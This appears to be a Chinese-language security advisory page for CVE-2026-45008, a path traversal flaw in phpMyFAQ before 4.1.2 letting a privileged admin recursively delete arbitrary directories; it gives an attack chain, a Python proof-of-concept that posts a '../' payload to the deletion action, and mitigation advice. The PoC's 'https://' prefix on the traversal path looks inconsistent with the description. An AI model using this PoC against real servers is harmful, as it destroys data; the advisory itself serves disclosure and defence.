CVE-2026-45008 CVSS 6.5 中危

CVE-2026-45008 phpMyFAQ路径遍历漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45008

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

phpMyFAQ

漏洞概述

phpMyFAQ 4.1.2 之前的版本存在路径遍历漏洞。拥有 INSTANCE_DELETE 权限的管理员可通过 Client::deleteClientFolder 函数，利用 client URL 参数提交包含遍历序列（如 ../../../）的恶意请求，从而递归删除预期范围之外的任意目录，严重影响系统完整性和可用性。

技术细节

该漏洞源于 phpMyFAQ 版本 4.1.2 之前的代码中，Client::deleteClientFolder 方法未对 client URL 参数进行严格的路径清洗。虽然利用此漏洞需要攻击者具备高权限（PR:H）和 INSTANCE_DELETE 特定权限，但这构成了严重的内部威胁风险。当应用接收到包含路径遍历序列（如 ../）的请求时，底层文件系统操作函数会直接解析这些路径，从而绕过预期的 clientFolder 限制。这种逻辑缺陷允许攻击者将删除操作导向 Web 目录之外的任意路径。攻击者可以通过发送特制的 HTTP 请求触发该漏洞，导致被指向的目录及其子文件被递归删除，对系统的完整性（I:H）和可用性（A:H）造成极高影响。

攻击链分析

STEP 1

步骤1

攻击者获取 phpMyFAQ 管理员账号并成功登录后台管理系统。

STEP 2

步骤2

确认该管理员账户拥有 INSTANCE_DELETE 权限，这是触发漏洞的前提条件。

STEP 3

步骤3

攻击者构造包含路径遍历字符（如 ../）的恶意 client 参数，指向欲删除的系统目录。

STEP 4

步骤4

向 Client::deleteClientFolder 接口发送特制的 HTTP POST/GET 请求。

STEP 5

步骤5

服务器端未过滤输入，解析路径并递归删除指定目录，导致数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target, session_cookie, delete_path):
    """
    PoC for CVE-2026-45008: phpMyFAQ Path Traversal
    Deletes arbitrary directories via client parameter.
    """
    url = f"{target}/admin/index.php"
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }
    
    # Payload using path traversal to delete a target directory
    # Example: delete_path = '../../../var/www/html/uploads'
    payload = {
        "action": "deleteclient",
        "client": f"https://{delete_path}"
    }
    
    try:
        response = requests.post(url, data=payload, headers=headers)
        if response.status_code == 200:
            print(f"[+] Request sent to delete: {delete_path}")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# exploit('http://localhost', 'valid_session_id', '../../../tmp/sensitive_folder')

影响范围

phpMyFAQ < 4.1.2

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应通过 WAF 拦截包含 '../' 或 '..\' 序列且指向删除接口的请求，并暂时移除非必要管理员的 INSTANCE_DELETE 权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表